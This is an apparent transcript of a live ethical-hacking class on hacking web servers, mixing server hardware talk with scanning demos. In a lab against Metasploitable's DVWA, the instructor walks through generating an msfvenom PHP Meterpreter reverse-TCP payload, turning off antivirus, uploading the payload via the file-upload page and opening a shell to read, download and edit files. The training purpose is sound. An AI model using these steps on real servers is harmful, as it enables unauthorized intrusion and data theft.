Hey, hi, thank you so much for joining.
Hi.
And yeah, I hope you had a great day the last weekend. So, we'll just continue from where exactly we have stopped. Let me see. Yeah, so I think in the last previous class we have completed this module that is IDS, IPS, and honeypots. So if that has been completed, then we can start with another topic. Let me see which is it. So we have this 13th module that is hacking web servers, and this we can able to complete it in an hour. And tomorrow hacking web applications. Okay. So we have like only few modules left. So maximum, as I mentioned, I think we can able to complete it in next. I think we can even complete it soon. So we have hacking web servers, and then two more, three, four, five, six, seven, eight. I think eight more modules are there. If I exclude one here, then even after excluding also we still have. So I think more 10 more classes, and we can able to finish it off. So hacking web servers, and it is very easy topic. It is not a big one, but performing this is the actual thing. It is not the big one, but it is as per ECCouncil, this module is very small. What they have mentioned, the content is too small, and so this is one of the main thing. But usually, not every hacker succeed in this attack. It's like very few people succeed in this, and it is. So let us see how does it goes. And for this, what I'll be using is we don't need Windows. We just need Kali Linux to be running, and if Kali Linux is running, we just need what do you say, Metasploitable is enough, because Metasploitable is also a web server. It'll take some time. We'll wait for a few minutes. Just a second. I'll just fix these errors. Okay, everything looks good. Yeah. So we'll just finish a basic theory and then we can get started with the practicals. So first we have to understand what exactly is web server, and then we can go with the web server hacking. See, to understand the web server hacking, it is essential to understand the web server concepts, including what a web server is, how it functions, and other elements associated with it. Okay, this section provides you a brief overview of a web servers and its architecture. It will also explain some common factors and mistakes that allows to hack a web server. So this section also describes the impact of web attacks on web server. So that means it is very clear. Before you compromise any web server, please make sure you understand how a web servers usually work and how does that looks like. So this is very important. How does that look like? What exactly is a web server? And then where exactly it will be hosted? And how does it look alike? You must understand everything. If we talk about a website, first how a website is hosted. So basically, I think you can understand how big is web servers, because upon web servers only everyone we are able to I can able to do Skype, I can able to open all these things. It is all because of web servers. So web server plays a very important role in our life, because without web servers internet is shut, finished. Internet, see, we have internet only to communicate between you and a web server. If it have Facebook, without web servers it will never work. Any website that is hosted or any website that we can able to open, it is a web server. It is finished. Okay, so it is very big thing. So hacking is something, to be honest, how does this real hackers basically act and what exactly the courses they might have completed. See, to be honest, I do have some of my gurus. I have been with them because I know this hacking things like 2014-15 we started, almost 10 years. So we started, it is all some basics. Even I had some basic knowledge, like small things, but I didn't know that how big it is. So it took a lot of time for us to understand things. And because most of them in the classes, some of them would like to continue their career in cybersecurity, so for them this is unnecessary topic. So some people will have some interest, because I do have a lot of students that comes on a weekend. Basically they're all very good businessmen and they just tell like this is my interest, like just like personal interest. Or maybe some people will come here just to know how things works, and some people will come because you wanted to build some career. And they do have some other people, they come here for the sake that they're already working in a security, but now they would like to get a promotion or something, so they come here for some classes. But so hacking, for those who would like to hack and everything, so for them just one course or all the 30 courses is really not sufficient. So cybersecurity is something that is, it is someone who is having an extraordinary skills on every damn thing about a computer. He knows everything. You talk about anything, he is having an answer. So basically the one who's having such a huge knowledge, they will comes under these categories. It is not like overnight someone will become a hacker. No, it took me literally 10 years. And even now we have still no idea about few other things also. And even though we have some defense side experiences, or we have completed over 11 certifications in 2023 I have completed, and yet to complete two more in the year to 2024. Only two, not more than that, only two more. So I'm gonna stop till there. So even after completing we couldn't still figure it out how we have figured it out how things work, but we still have a lot of thing. Every year the security changes, every year we have to sit and learn once again. That's how it works. So you must understand how a web server works first. You must have an experience in at least installing an operating system to a web server, and you must have an experience to touch and feel a web server. Because whenever we Google web servers, no, I'll tell you what happens. Whenever we simply Google web server and we click on images, the problem is that we only get this diagram. See, we only get this diagram, but where is a web server? This is the main problem. Whenever someone Googles a web server, they'll get like this. This is web server, I mean web browser. This is internet, this is web server. So you request, you get responses. You send hi, you get a response from the web servers. That is called as three-way handshaking. So the problem is not, ours. The problem is that in internet, when we type web server, people will only get the theory knowledge. How does a web server looks like? That is where the main thing. See, how you have to Google is not like web server, or even if I Google what is web server also, I might get the same thing. You have to Google like this. How? One second, let me make sure. Yep, everything is good. So you have to Google how a web server looks like. When we Google like this, how does a web server look alike? See, this is how you will start getting some other diagrams. Now they have mentioned this is web server, and you might think like, what exactly? They look like a box, right? You might think like it look like a box. Let me open the full image. See, you think like, okay, this is a web server. It looks like a box. So this is where the Facebook and everything will be hosted. Yes, to be honest, it is, because this is actually a data center. But inside data center, there are web servers. There are web servers. I'll show you how does a web server looks like. This is actually called as a group of web servers hosted together, makes it a data center. Data center is where you will have 1 lakh servers at one place. So you can see the small 1 2 3 4 5, we can count them. So basically they are the web servers. And in real, if I take a one part of it, one part, if you come to my office, you can see one of that web server. So usually this is how a web servers looks like. This one second, let me open this image. See, this is how a web server actually looks like. Yeah, it looks like but it is actually a computer. So web server is actually, it look like a CPU, but CPUs look like a big box, but this is like very plain, so that they can fit into that server rack. See, this is how a web servers usually looks like, and these are all the orange color. You can see they're all fans. Okay, and at last we have two power supply. This is one SMPS, this is another SMPS, and we have some SSD slots, and we have these are all the RAM slots. See here, all of them are RAM slot. There is a single processor. If you come to our office, you can able to see two processors. One, if you go, if you want me to do a video call from my house, you can see four processors. One CPU comes with single processor, correct? But whereas server usually comes with, if you can able to listen to some background noise in this office, just now a little bit of noise is coming up and going, it is actually a web server which is making a noise, because I just had a web server, so that I can show you how does it looks like inside. So you can see all these things, right? mm, this is actually processor, these are all the fans, because 24 hours for like 5 6 years it will be running non-stop. So to cool down, we have some fans. You require AC, and they have connected some keyboard, mouse, and there is one more cable that is connected actually for the display. So it is exactly, and there are some hard disk in the front. There will be a hard disk in the front. So if you come to office, you can, we have physically, this is available, and I think we have two other students, they are connected online today, they didn't come to classroom, because this is a problem with Mondays, Mondays are like that. It is not from our side, it is actually the Monday issue. And my classes were unsuccessful in almost all the Mondays. Yeah, because Mondays now, it's like, I don't know what kind of day it is. Usually it will be unsuccessful. But even many classes I have skipped, many classes on Mondays. So anyway, so this is how a web server actually looks like, and if you and how much does it cost? So basically, or you can even Google like this, just simply Google server. See, in server there are so many types, but every server looks same. See, if you Google server only, you can get to see. But in server, suppose if you want to use it for email purpose, then it is SMTP. SMTP server. You want to share data from each other, then it is called as FTP. If you want to host a website, then it is called as a web server. So you can use it however you want. Server is server. See, if you build a house, you can even give it on rent, then commercial. Got it? If you give it on so many things, if you stay by yourself, it is a home. If you give it for someone, it is rented. If you give it for some office purpose, then it is commercial. So but house is a house. Your land is a land. What you build on top of it, that is what it is called as. If you build your house, it is called as a house. If you build a complex, it is complex. But land remains same. Server remains same. But what you gonna build in it? You're gonna build a website, then it is a web server. You're going to use it for email, then it is an email server, mail servers, like that. See, there are so many hard disks in it. Yes, that's how it looks. But yeah, anyway, see, this is how in web servers we'll have so many hard disks and data will be running. So as of now, I have my web server which is connected in my office. So let me just ping my web server if it is running successfully. So that I can show you inside how does it look like. Then we'll talk about hacking it or whatever you want me to say, Anyway, so let me try to open Kali. No, not Kali Linux. I'm gonna just try to ping 192.168 1.1 100. So, okay, that means see, this is my web server actually. How will I know whether it is a web servers or not? Because 128 128 is looks 128 is also the same as I'll just mention iPhone O. 128 also looks like Windows. Oh, sorry, I have to change this ping and I have to change to Nmap. So you might think like 128 is common for Windows 7, Windows site. How do we know that it is web server? So I'm gonna just type sudo. Holy shit! Yes, because since 2 days I have used my other laptop. So in other laptop the keyboard is very big and this laptop keyboard is too small. I get confused while typing. Anyway, so now let us see what kind of operating system it is running. See, it usually Windows operating system. It is guessing out of 97% it is Windows server. Say running Microsoft Windows 2016, 2012, 2022, or it could be a phone or it could be 97% it is guessing it is actually a web server. To be honest, it is actually a web server. And I can also run Nessus. I can also run Nessus. Yeah, I can simply type admin. Let it also scan because I don't think so my license is still valid because I created like many months back. Let me see. I'm gonna scan once again. Basic network scan. And here I'm gonna type the name. It is actually Windows based server. Okay, if I install Linux, then it is Linux based server. Simple as that. 168.1.100 is my server pass IP address. And now I'll leave it for scanning, but I have my firewalls everything turned on. I have turned on everything. Firewall also have turned on. So it has at last. Let me click. Let me launch it, but I don't think so. It might work because my Nessus has been expired very long back. Very long back it has expired. But if it is working, it is good. If it is not working, no problem. Anyway, I'll teach you how it is done. So that means now my server is up. Let me show you how does a server looks like. To access my server, I will be using remote desktop protocol called as RDP, remote desktop connections. The protocol name is RDP port. This is my computer name. I have already given the password, so I'm going to click on connect directly. It is establishing a connection with my server. If I make it public, even you can also access my server sitting from there. Yeah, server name of the certificate is incorrect. The server is not trusted. Okay, fine. That I think it will ask me to type a password. I'm gonna type a password and then proceed. You can ignore the errors. See, this is my web server currently opened up. I have my Windows. See, this is my Windows. I'm not running from VirtualBox. It is actually directly running from Windows desktop protocol. So I'm gonna just type the. It is actually demo class because it is domain based. So let me type admin at. Okay. Yeah. See, this is my Windows Server. Windows Server 2016 servers. It is Windows 2016. Server, and I have installed 16. The latest is 22, and companies will prefer 2012 2016 only because the latest will have a lot of issues, so no companies will prefer. This is how a server dashboard looks like. We have ADDS, active directories and domain systems, and DSCP, dynamic host configuration protocol, DNS, domain name systems, FTP, file and storage services, and Hyper-V, and then we have IIS, internet information services, and NPAs. We have like so many things are running here. It is me who is running all of this because I have hosted a website. So if I open this piece, it looks like Windows 10, right? It looks like Windows 10, and I have a server, and I have given one of my instructor, and for me we have created like 500 GB 500 GB space because in our laptop we don't have space. Look at this, we don't have space in our laptops, all full. This is only 5 GB left, and this is also 5 GB left. So we have taken access from the server. See, this is server access. We have taken it in our office because that is what the servers are used for, and we have also hosted a temporary website in it. So see, this is a Windows. Oh, it is running successfully. Windows server. It is giving us almost, it will give us almost all the vulnerabilities it presents inside. It is rotating. Let it rotate. I mean loading. Mm, what else we can able to see? It looks like Windows 10, but to be honest, it is not. It look alike. That's it. But if I open the, see, we have administrative tools. We have server manager. If I click on administrative tools, where exactly the website will be hosted? Okay, where exactly the website will be hosted? So basically, a website will be. See, this is for example, I have one temporary website here. This is a website, and I shouldn't be using these companies as for my demo classes. I'm working on to report some issues for the company, but I shouldn't have taken this website. But anyway, so this website has been hosted, right? Actually, this website is hosted in, if I open this Vapalizer, and I have also created one more server called as beauty.com. This is also our server. It is in our office only we created. Simply, just simply we created one web server for the practical purpose. See, there is a domain name, and here also there is a domain name. But okay, we have to wait for this Vapalizer to work. I don't know what. Okay, I think the issue is not with this one. So issue is with the relaunch to update. I have to relaunch. Just a second. I'm gonna relaunch. It will close and it will open itself so that vaporizers will start working. It will open itself. Let us wait. And let me see. Shit, Nessus was also running. Anyway, but Nessus, it will be doing its job. It will be doing its job. And we had a CPENT class also. We had, this is an introduction class of CPENT, Certified Penetration Tester. So basically this comes after, first comes CH and then comes the CPENT. CPENT is a bit advanced. Advanced in the sense very, very advanced. Okay, I have opened it, and let me check if my web server is also, I mean it is scanning my web server Nessus. But what happened to this vaporizer? For any other website also it has not given. This vaporizer isn't working. Not sure if it is my internet issue or the web server. It is loading. It will taking a lot of time to load. Is there an issue from my side, like a voice or the screen delay or anything like that? Could you please confirm? Am I audible?
Yes, sir. Yes. No
Yeah,
issue.
because I don't know. It's still taking a lot of time to load almost all the servers. Not sure if it is the browser issues or the internet one. I can also install it in Firefox also. But anyway, so it is still scanning my web server, and so far 100% information is still gathering, but there is no loopholes. But yes, there are some vulnerability information is present. There are some information which is present, but we cannot call it as a vulnerability still because it is an information. This is taking some time, and the other browsers are also not responding. Okay, vaporizer extension. Oh, I have my vaporizer installed here also. So here also I can open the website. HTTP, one sec, it's opening several times. beauty.com. This is our website. We host it in our office. See, this is the website, and I think it is a browser issue because here it is still loading, and here I have already installed it. And if I click on this extension vaporizer, let me pin it. See this vaporizer, it has gathered information that currently this website is running in a web server called as IIS, and this is the version. And I can also see that, where is it gone? So here, and I can also see that it is running in Windows Server IIS, Internet Information Systems, and then it has used some fonts called as Font Awesome, and it is made up of UI UX, that is UI framework itself known as Bootstrap. Anyway, so since it is hosted in web server, so what happens is we can hack a web server directly, or we can hack a web server with the help of a website. Simple as that. We can also hack this web server directly if it is running in our systems. But if it is not, then we can also hack this website web server with the help of a website. Okay, these are the two things. So now it is still gathering informations in Nessus. Let me just close all of them. So even this website also, even this website is also running on IIS, but there is a browser issue. But anyway, see, this is not a vulnerability. It is just trying to show you that server is running on this port and SMB is running on this port. This is only an information, but it is not shown any vulnerabilities yet. But it might contain some of the vulnerabilities. It might contain some of the vulnerabilities, but it is not showing yet. It might take a lot of time, or maybe because some compiles are some plugins are compiling in the background. But anyway, let us get started directly with one of the practical. The similar way, I do have one more server which is running in my system. For you, since you don't have any web server, you can use this Linux based web server. Metasploitable is also a web server. MSF admin is a username, and MSF admin is the password, and ifconfig. And okay, if I type ifconfig, I can see that 61 port number 61 which is currently running, and I can type directly 61. See, Just like my web server, even here also it works, but usually my Windows 10 is also running. If I type 100, then Windows server, see, this is my Windows server, this is my Metasploitable, this is my Windows, simple as that. It is actually a browser issue anyway. So this is my Windows server and it is running successfully. This is actually a demo one, so I can hack this website and I can even get into the web server. This is Windows server and this is Linux server. That's it. This is the only difference. And I can also run this in Firefox. That is 192.168.1.100. And here I will type 192.168.1.61. See, both the operating systems are here. I mean, both the things. So here it shows server. If I click on this extension, it will show that it is web server is Windows server. And if I click on this Metasploitable, it will show that it is operating system is Ubuntu. Simple. So this is, see, the web server is Apache HTTP server, but this web server is Windows server. This is Linux server. Ubuntu is Linux, right? So we can use both. And Windows 10, I mean, sorry, Windows server. See, we have internet information services called as IIS. So in this IIS only the website has been hosted. So if I open this, I have some of the sites which are currently running. If I extract these sites, you can see that beauty.com. Beauty.com is a website that we hosted in our office. See, the website is hosted here and I can see all my files here only. I have my files, I have SSL settings, I can configure and I can even do so many things. I can even stop this web server. If I click stop, it will stop the web server. So I'll show one of them. So we have Metasploitable. Since you guys don't have Windows 10, sorry, Windows servers with you, so you can directly go and install Metasploitable. And in Metasploitable, we can directly hack. Okay, we can directly hack by running some scripts or by using Nessus. Because in Nessus, see, it is still running. Windows server is still running. Because here what happens, in Metasploitable there are already several vulnerabilities. Okay, we can even we can even hack directly the server. We can even hack this server directly because there are so many issues in the server. So we can see these server issues and we can able to hack it. It's not a big deal. That we have did in Windows system hacking itself. In system hacking itself we have did all these things. But now I'm going to teach you a different method how to hack a web server with the help of a website. Commonly everywhere you can find. See, it is still running. Now there are two vulnerabilities. I can even hack Windows 10 also. See, I can even hack Windows 10 also now. Not this Windows 10. Why am I opening Windows 10 again and again? It's Windows Server. I can even hack this also because it look like Windows 10. That is the main problem. I can even hack this Windows Server. Actually, I can even hack Linux both because there are some vulnerabilities. If you analyze this vulnerabilities, no, there are already two vulnerabilities are showing high vulnerabilities and seven medium vulnerabilities. You can even exploit them. But now we'll go with Linux. See, in Linux, you can directly open DVWA. In DVWA, you can type username as admin and password as password. Because if you scroll down, it is showing here admin and password and click login. It has opened successfully. And here, whichever the websites you go nowadays, whichever the websites you open nowadays, there will always an issue with every website. There will be an issue, but how do you understand those issues? And whichever the websites you open nowadays, including the government websites or whichever the website, they will always have an option to upload. You can also upload some documents, or you can even upload your own photo as a profile photo. You might see this very common everywhere. So the similar way, I do have one option here called as upload. I can even upload any file. So if you, whenever you get a chance, like if you want to upload any file, you can directly upload a file. Like you are, instead of uploading your own image like this. So you usually what you will do is you will upload your image. Let me just set it to low, because in penetration testing we usually set it to high and we do, but ch we can set it to low. And in this upload option, I can upload whatever the photos files I want, right? Let me see if I have any photos. um, I have some photos here. I can directly click on this file like PNG and I can click on upload. So this image was not uploaded. So let me choose some other images if I have, so that it will be uploaded. I want a simple image. Okay, I have this cat photo because I have very few, and here also I have the same photo. I can simply upload this and click upload. See, it has uploaded successfully. Usually there it will self execute, because in profile photo it will execute itself. Web server will try to execute itself. So here, since there is no option to view, I have this location path. I can choose this location path. I can copy from hackable to JPG, and there are two dot forward slash here, so you can select this is one forward slash and this is second forward slash. So usually from here you can click on you can copy and paste this one, hackable uploads new dot jpg, and click enter. So you can now able to see this cat photo. It's like a very small cat we have. And now I can even come back, and so now that I have an option to upload a cat photo, I can also upload a, what do you say, I can also upload apart from this one, I can also upload some virus. So we can also create a virus. You can open the Kali Linux, and in Kali Linux you can type msf venom, and first make sure to first know the Kali Linux IP address, ifconfig. It is 1.23. So you can type msf venom, same command here -p, but everything will be same, but we are going to change a little bit. We're going to type php metapreter reverse tcp, and what is the 23 is the IP address. So just change your L host to 23 and L port to 4444, -f format, raw format, and you can just mention any name.php. I'll just give new virus sample.php and click enter, and it will take some time to create your new virus. So now in the place of image we are going to upload this virus so that it will hack this web server directly, but we're going to hack a web server with the help of a website. Now you can run ms of console, and here another tab you can type python -m http.server 9000, so that I can get this file directly here. But you have to make sure that your antivirus is disabled, otherwise it will detect as virus. Of course we have created this virus, so we're gonna just disable it. You can disable this real-time protection, and now type the IP address of Kali Linux 192.168.1.23 and 9000 port number. So here control F dot php. So here new virus sample.php, I have it now, and this is just a small virus, 2 KB virus. Okay, and what you can do is you can now make sure, okay, you can stop this web server, I mean this one Python HTTP server, because we have downloaded already. Now we use default commands, use exploit multi handler, and payload, don't take this, set payload php metapreter, or you can, if you don't want these headaches, you can directly copy from here. And it has taken. Now set lhost your IP address, Kali Linux IP address, don't mention the server IP address because we don't want server IP address, 1.23, and click enter. Now click on run. So this will be running, waiting for the new connection. So what you can do is, see, it is showing here, and now I can open Metasploitable. In Metasploitable, okay, one second, let me open this Metasploitable. I have opened it in Chrome. And here I'm gonna upload. I'm gonna upload that virus that I have just downloaded. So here it is. I'm gonna click on upload. So it has uploaded successfully. I'm gonna copy till here. Hackable uploads new virus sample.php. And now you have to self-execute, because see why you don't need to type this in the real website, because in real website it will execute itself. But since here I don't have any option to view, so that's why I'm using this method. I'm gonna click, the moment I click enter, see what happens. I have uploaded only. Let me split this screen like for two. And see, this is my Kali Linux. It is waiting for the server. Now, the moment I click enter, see, it is running, and here you will get session opened. Now that you get session, just simply type ls. Wait, if you type ls, you can see that all the files that has been uploaded in the web server. Now you can directly type download, and you can download the web server. If you type system info, it will show that it is Linux server and you have hacked web server directly. And now how do you gonna get your files and everything? Just simply type ls. See, these are all the files that are consits, and it will also show the location. If you want to go to hackable, cd space dot dot, now pwd to check which folder you are. You are currently in hackable folder. Now you can type ls to list. Okay, you have users, you have uploads. You can directly type download space users, it will download automatically. This is how a web servers are hacked. See, ls, you can get, there are so many names. Suppose for example you want to see what exactly this about.php, you can directly type cat about.php. You can directly see what exactly is that file, and this is how, and if you modify this, it will also modify there. You can directly type nano and you can modify this file directly. So in the website also the changes will happen. This is how our websites will basically hacked. This is a topic of how to hack a web server. So if you have understood this, then we can get started with the web applications. That is a very big topic. Okay, this is web server behind the web application. This is what we have to do. Behind every website there is a web server that you have to understand. Okay, so I hope you understood this class, and if you have any doubts, kindly let me know. And since the class is recorded, you can watch again and again, but please make sure that you go through the theory part. Okay, all right. So, all right, then I'll just stop it till here, and you guys will have enough time. You can practice it, and if you get any issues, let me know. We'll fix it off. Okay.
Sir,
All right, then.
hello.
Yeah.
Sir, can you please share that penetration testing syllabus? I will go through it.
I don't think so. I'm allowed to do it because everything is password protected, and I don't think so. And the books are not belongs to institution too. It is mine, and moreover, every page there is my name is mentioned on that. That's the main
Okay.
problem. Yeah, and
Okay.
that books itself comes. I think it is 5.5 GB books. I don't think so. They will allow us to do this. Yeah.
Okay.
Um, but let me just talk to them if they allow me to do it, because the class will be recorded. There will be so many students, then everybody will start asking me for these books. If it is like this, I even have OSCP books, I even have everything. I have books worth more than, I think I have more than 20-30 GB only books only. Yeah,
Okay.
but anyway, I'll just talk to them once, and if they allow, because otherwise what happens, the class will be recorded. They'll just crop that class and they will send it to the management that Akash has shared. Then they will come that students are not enrolled because of this. These are the blames that will start. And moreover, that books are, doesn't even belongs to the institution itself. It is mine because I have paid for that and I have access to it. I
Okay.
was just yeah, because I had one student for CPENT, so I was just working on them. So CPENT is 3 times bigger than CH, but that is nothing to do with hacking. It is actually penetration testing. That is not hacking at all. That's totally different.
Where do you perform penetration?
Where do we perform penetration testing?
Like OS, DVWA.
We actually perform penetration testing in our offices, because see, I'll tell you what is penetration testing. We have VAPT, vulnerability assessment and penetration testing. So VAPT, what you guys are learning is VA, that is vulnerability assessments, means how to find a loophole, and you will only have an idea that how to find a loophole. See, for example, these many days I did class. I did class for almost like many days. So you don't have much, you won't be having much knowledge. Like for example, there are so many other. I'll show you. Let me just log in. Like basics vulnerabilities. So, okay, Nessus has detected API access scan is scanned. If you believe this is an error, this shit. Oh, I'll just open it in the other browser. I don't know what is the issue with the Chrome one. See, I'll try to open my Nessus in other side. Accept the risk and continue. In the CH, what happens is you will only have idea that okay, there are loopholes. You will see that okay, there are two loopholes. I'll simply now directly click on this high vulnerability. So this is a loophole. Basically, what happens is you know that okay, there is a loophole, but can you explain what exactly it is? What exactly is SSL medium strength cipher suit supported? The remote host because and moreover you might think like oh, my instructor has not thought about this. No, it is not comes like an instructor because this issue is only if you can find it in my laptop. What if your office is having a different one? You will never see this in your offices at all. So because vulnerabilities there are more than 50-60,000 loopholes and an average every year every month, okay, every month, like for example patch Tuesday, December 2026. What day is patch Tuesday? What happens on? I can even check like total vulnerabilities. What is that? Or I can even like what is that? Windows vulnerabilities patch Tuesday. For the month of, we'll just mention it as November. See, November is finished already. I'll just simply mention how many okay, what are the issues with November patch Tuesdays. So it is mentioning that like there were so many issues in Windows very recently. So for the November patch Tuesday, that means last month only, Microsoft addressed 4 bugs in Exchange server. 3 were spoofing vulnerabilities with all this one, so very critical vulnerabilities. The other was remote code execution, so called as this, are really important. Now this is the recent one. I have to mention 9 here with the last. So this is the very recent. See, 14th November, somebody has reported there is an issue with the Windows, something with the Windows. So what happens is that you have no idea what is Microsoft Exchange Server remote code executions, because one thing you know that yes, there is a loophole, there is a loophole, but can you hack it and show me how does it do? Because you might start doing like okay, where is CV number? You okay, I got CV number. Now we'll open the CV number directly. But in CV number, what you will do is you will start searching for exploit DB. What if there is nothing found in exploit DB at all? Then you won't hack it. See, I have so many mentioned here, so many websites. See, Oracle, Splunk, Ubuntu, Red Hat, and till you will scroll down till you will scroll down, because I thought you only what is that exploit DB. You and exploit DB is here. What if exploit DB is not here? Then you'll give up. You don't know how to hack next. So basically, what that is why see this is an IBM server and there is the code. But I opened it directly here. Let me check whether whether this is already there in my Kali Linux or not. Some chances like you might find it, but other chances I don't think so you can find it. So that is where the problem begins. So that means you have an idea that how to find a loophole, but once there is a loophole, have no idea how to exploit. So what they will do is basically there is a team called as penetration tester. So your work CH will only help you to find the loophole, but CH will not help you to exploit the loophole. So basically companies what they do is once you find any loophole, you will need to submit the documents to the, see there is one, you will need to submit this documents to the penetration testing team, because penetration testing team will have the knowledge of patch management and everything. They will try to hack without even any exploits, because they will be so much, they will have so much knowledge, they can even try to do it directly. So this is how they will do. See, this vulnerability I opened directly by clicking on CVE. It is because it is August 24, 2016. That is why this is already available. See, this is not latest 2017, but can you find the latest one? No, you won't get it. Latest ones won't be here. You have to try to do it yourself. That is where the penetration testing classes are for. But that is why it is that is why it is called a penetration testing, and CH is VA. That means CH will only help you to find the loopholes, whereas penetration testers will have both the knowledge. They know how to find it, they even know how to hack it. So for them it will be very easy, and it is very advanced, and that classes will go more than 60 hours. And but what they will do is, in this institutions, I don't know for how long my contract will be. So even if I take, I have to give my 60 hours for that classes. So that is why I have simply haven't taken any, but I have taken only one CPENT so far. Just last Saturday only I just had one class of it. But yeah, after that I don't think so I'll be accepting any of them. Because there are so many things. These are all very old. See, 2017 one. But very recently, I told you just November only, there were so many loopholes. There were enough loopholes, but no one have any idea about it. See, this is a vulnerability information. You will try to go check, okay, I have vulnerability, it is very high. Let me see. This is latest, just last month only there. But here you are getting some other Microsoft related one. But where is exploit DB? You won't get exploit DB, then you will say, I don't know how to hack. So penetration testers are those guys who will have some programming skills and other things. They will try to patch it. So that is where the CPENT comes in. And I have been a licensed penetration tester like almost in 2016 only I completed that. But so that's what. But that classes I had the latest one. So because latest one, because I'm a certified instructor for ECCouncil, so I got to request them for CPENT books, and I still have the raw only. They have because it is confidential, where there is my name is mentioned, and if it is leaked online, then it will be a loss for ECCouncil that okay, this Akash has leaked my books because my number is there, and I every page now in the at the last there is my name is mentioned because this is licensed to. So that is why what happens, the moment I share this file, then ECCouncil, if they find out in the internet somewhere, in the internet, if it is leaked, then immediately they will suspend my license and all those things. So that is why I'm unable to share this book. Otherwise, see, books are simply somebody else has written, I can share it. But the only thing is my name has mentioned at the last on every page. That's the main problem. So VAPT means vulnerability assessment and penetration tester. So what you're learning is vulnerability assessment, not penetration testing, because penetration testing, that is very professionals will handle, and so that is totally different classes. Okay, I hope you understand. But I
Yes,
can
yes.
still ask them if they allow us, or if they subscribe to it, and if they share it with you. Okay.
Okay,
So I
sure.
hope you got a clarity on what
Yeah,
you are
got it.
learning and everything. But if
Yes.
you really want to become hacker, there are so many courses also which is related to them, like API, and there are so many other one which is related to it, that will help you to master. But we have to. But the word ethical hacking, no, will impress everybody. I'm gonna become a hacker. I'm gonna become a hacker. No, it is actually designed for cybersecurity experts so that they can find the loopholes and they can patch it. So anyway, if you need any more information, please let me know. And if you have understood this concept, we can directly start with the another one. Okay, that is web applications tomorrow. And I might take, I don't know how many days, I might take 1 day or I might take 2 days, depends on tomorrow's class. All right, then I'm going to see you guys in tomorrow's class. Thank you so much for joining. I'll see you soon tomorrow.
Thank you, sir. Bye.
Yeah.